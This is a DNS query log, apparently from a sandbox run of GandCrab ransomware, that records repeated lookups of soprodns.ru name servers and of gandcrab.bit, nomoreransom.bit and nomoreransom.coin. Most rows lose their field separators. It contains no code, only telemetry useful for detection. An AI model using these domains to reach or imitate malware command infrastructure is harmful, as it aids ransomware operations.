Aug 31, 2022 23:58:43.003278017 CEST | 192.168.2.3 | 8.8.8.8 | 0x3 | Standard query (0) | nomoreransom.bit | 28 | IN (0x0001)
Aug 31, 2022 23:58:43.024086952 CEST | 192.168.2.3 | 8.8.8.8 | 0x4 | Standard query (0) | nomoreransom.bit | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:43.044194937 CEST | 192.168.2.3 | 8.8.8.8 | 0x5 | Standard query (0) | nomoreransom.bit | 28 | IN (0x0001)
Aug 31, 2022 23:58:45.860322952 CEST | 192.168.2.3 | 8.8.8.8 | 0xc71c | Standard query (0) | dns1.soprodns.ru | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:46.506845951 CEST | 192.168.2.3 | 8.8.8.8 | 0x1 | Standard query (0) | 8.8.8.8.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:58:46.526858091 CEST | 192.168.2.3 | 8.8.8.8 | 0x2 | Standard query (0) | gandcrab.bit | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:46.555077076 CEST | 192.168.2.3 | 8.8.8.8 | 0x3 | Standard query (0) | gandcrab.bit | 28 | IN (0x0001)
Aug 31, 2022 23:58:46.573612928 CEST | 192.168.2.3 | 8.8.8.8 | 0x4 | Standard query (0) | gandcrab.bit | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:46.594398022 CEST | 192.168.2.3 | 8.8.8.8 | 0x5 | Standard query (0) | gandcrab.bit | 28 | IN (0x0001)
Aug 31, 2022 23:58:52.439661980 CEST | 192.168.2.3 | 8.8.8.8 | 0x4a62 | Standard query (0) | dns1.soprodns.ru | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:52.509126902 CEST | 192.168.2.3 | 8.8.8.8 | 0x1 | Standard query (0) | 8.8.8.8.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:58:52.529035091 CEST | 192.168.2.3 | 8.8.8.8 | 0x2 | Standard query (0) | nomoreransom.coin | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:52.552397013 CEST | 192.168.2.3 | 8.8.8.8 | 0x3 | Standard query (0) | nomoreransom.coin | 28 | IN (0x0001)
Aug 31, 2022 23:58:52.570688963 CEST | 192.168.2.3 | 8.8.8.8 | 0x4 | Standard query (0) | nomoreransom.coin | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:52.590786934 CEST | 192.168.2.3 | 8.8.8.8 | 0x5 | Standard query (0) | nomoreransom.coin | 28 | IN (0x0001)
Aug 31, 2022 23:58:54.559582949 CEST | 192.168.2.3 | 8.8.8.8 | 0xcea6 | Standard query (0) | dns1.soprodns.ru | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:54.611123085 CEST | 192.168.2.3 | 8.8.8.8 | 0x1 | Standard query (0) | 8.8.8.8.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Aug 31, 2022 23:58:54.630989075 CEST | 192.168.2.3 | 8.8.8.8 | 0x2 | Standard query (0) | nomoreransom.bit | A (IP address) | IN (0x0001)
Aug 31, 2022 23:58:54.651252031 CEST | 192.168.2.3 | 8.8.8.8 | 0x3 | Standard query (0) | nomoreransom.bit | 28 | IN (0x0001)
Aug 31, 2022 23:58:54.669703007 CEST | 192.168.2.3 | 8.8.8.8 | 0x4 | Standard query (0) | nomoreransom.bit | A (IP address) | IN (0x0001)
                                      Aug 31, 2022 23:58:54.690068007 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:58:56.637871027 CEST192.168.2.38.8.8.80x98daStandard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:56.711035013 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:58:56.731127977 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:56.749512911 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:58:56.772804976 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:56.793273926 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:58:59.232460976 CEST192.168.2.38.8.8.80xbf18Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:59.292783976 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:58:59.312763929 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:59.338818073 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:58:59.357353926 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:58:59.376303911 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:01.363595963 CEST192.168.2.38.8.8.80x33a6Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:01.436424971 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:01.454658031 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:01.474961042 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:01.493232965 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:01.511754036 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:03.366775036 CEST192.168.2.38.8.8.80x4894Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:03.423759937 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:03.441447020 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:03.462712049 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:03.482703924 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:03.503720045 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:05.917948008 CEST192.168.2.38.8.8.80x428cStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:06.518330097 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:06.541033030 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:06.561108112 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:06.582118988 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:06.600199938 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:11.520944118 CEST192.168.2.38.8.8.80xf42eStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:12.277647972 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:12.297575951 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:12.328339100 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:12.348893881 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:12.369224072 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:14.234563112 CEST192.168.2.38.8.8.80x4340Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:14.331684113 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:14.353291035 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:14.371988058 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:14.392903090 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:14.413882971 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:15.707844973 CEST192.168.2.38.8.8.80xca4bStandard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:15.767276049 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:15.789041996 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:15.809427023 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:15.838541031 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:15.856786013 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:17.091232061 CEST192.168.2.38.8.8.80x160bStandard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:18.080478907 CEST192.168.2.38.8.8.80x160bStandard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:18.249520063 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:18.269253969 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:18.287184954 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:18.305428028 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:18.325584888 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:19.656590939 CEST192.168.2.38.8.8.80x9891Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:20.653614998 CEST192.168.2.38.8.8.80x9891Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:20.699863911 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:20.720499992 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:20.740564108 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:20.761806011 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:20.780160904 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:22.015532970 CEST192.168.2.38.8.8.80xc448Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:22.154289007 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:22.173866034 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:22.195880890 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:22.215950966 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:22.235685110 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:23.593552113 CEST192.168.2.38.8.8.80x9641Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:24.188785076 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:24.206868887 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:24.227190971 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:24.245595932 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:24.265731096 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:25.542416096 CEST192.168.2.38.8.8.80x72c8Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:26.630718946 CEST192.168.2.38.8.8.80x72c8Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:27.172085047 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:27.189977884 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:27.247838974 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:27.268862963 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:27.287358046 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:28.925348043 CEST192.168.2.38.8.8.80xbe66Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:30.260584116 CEST192.168.2.38.8.8.80xbe66Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:30.844980955 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:30.866137028 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:30.884764910 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:30.905071974 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:30.923072100 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:32.225573063 CEST192.168.2.38.8.8.80xc8b1Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:32.305984020 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:32.323930025 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:32.344903946 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:32.365597963 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:32.396919012 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:33.635987043 CEST192.168.2.38.8.8.80x6b6bStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:34.632500887 CEST192.168.2.38.8.8.80x6b6bStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:35.644903898 CEST192.168.2.38.8.8.80x6b6bStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:36.543714046 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:36.563648939 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:36.584182024 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:36.602427959 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:36.620733023 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:37.851984024 CEST192.168.2.38.8.8.80xbe0fStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:38.863599062 CEST192.168.2.38.8.8.80xbe0fStandard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:39.448174953 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:39.465929985 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:39.484544992 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:39.503390074 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:39.521467924 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:40.790900946 CEST192.168.2.38.8.8.80x3976Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:40.836529016 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:40.854235888 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:40.874320984 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:40.892307043 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:40.910653114 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:42.179858923 CEST192.168.2.38.8.8.80x94a7Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:42.235496044 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:42.262891054 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:42.281209946 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:42.301537037 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:42.322125912 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:43.590250015 CEST192.168.2.38.8.8.80x70aeStandard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:44.583146095 CEST192.168.2.38.8.8.80x70aeStandard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:45.599035978 CEST192.168.2.38.8.8.80x70aeStandard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:45.651026011 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:45.671057940 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:45.691448927 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:45.711695910 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:45.737027884 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:47.058562040 CEST192.168.2.38.8.8.80xed4Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:48.075234890 CEST192.168.2.38.8.8.80xed4Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:48.150029898 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:48.168544054 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:48.189199924 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:48.220005989 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:48.239259958 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:49.506455898 CEST192.168.2.38.8.8.80xae84Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:50.521322966 CEST192.168.2.38.8.8.80xae84Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:50.556144953 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:50.576560974 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:50.605078936 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:50.625201941 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:50.649034023 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:51.926340103 CEST192.168.2.38.8.8.80x4be7Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:51.969147921 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:51.989362001 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:52.023263931 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:52.043279886 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:52.063211918 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:53.315284014 CEST192.168.2.38.8.8.80x8b86Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:53.910933018 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:53.930680037 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:53.952245951 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:53.975918055 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:53.997132063 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:55.249011993 CEST192.168.2.38.8.8.80x1e6dStandard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:56.259572983 CEST192.168.2.38.8.8.80x1e6dStandard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:56.303123951 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:56.322889090 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:56.342972994 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:56.360950947 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:56.381031036 CEST192.168.2.38.8.8.80x5Standard query (0)gandcrab.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:57.561789036 CEST192.168.2.38.8.8.80x2252Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:57.647419930 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:57.667177916 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:57.687539101 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:57.705862045 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.coinA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:57.726016045 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.coin28IN (0x0001)
                                      Aug 31, 2022 23:59:58.812098026 CEST192.168.2.38.8.8.80x82c8Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:59.818274021 CEST192.168.2.38.8.8.80x82c8Standard query (0)dns2.soprodns.ruA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:59.859764099 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Aug 31, 2022 23:59:59.877731085 CEST192.168.2.38.8.8.80x2Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:59.898864031 CEST192.168.2.38.8.8.80x3Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Aug 31, 2022 23:59:59.919053078 CEST192.168.2.38.8.8.80x4Standard query (0)nomoreransom.bitA (IP address)IN (0x0001)
                                      Aug 31, 2022 23:59:59.939438105 CEST192.168.2.38.8.8.80x5Standard query (0)nomoreransom.bit28IN (0x0001)
                                      Sep 1, 2022 00:00:01.037652969 CEST192.168.2.38.8.8.80xb09Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:02.037312031 CEST192.168.2.38.8.8.80xb09Standard query (0)dns1.soprodns.ruA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:02.080656052 CEST192.168.2.38.8.8.80x1Standard query (0)8.8.8.8.in-addr.arpaPTR (Pointer record)IN (0x0001)
                                      Sep 1, 2022 00:00:02.100950956 CEST192.168.2.38.8.8.80x2Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
                                      Sep 1, 2022 00:00:02.120944977 CEST192.168.2.38.8.8.80x3Standard query (0)gandcrab.bit28IN (0x0001)
                                      Sep 1, 2022 00:00:02.142087936 CEST192.168.2.38.8.8.80x4Standard query (0)gandcrab.bitA (IP address)IN (0x0001)
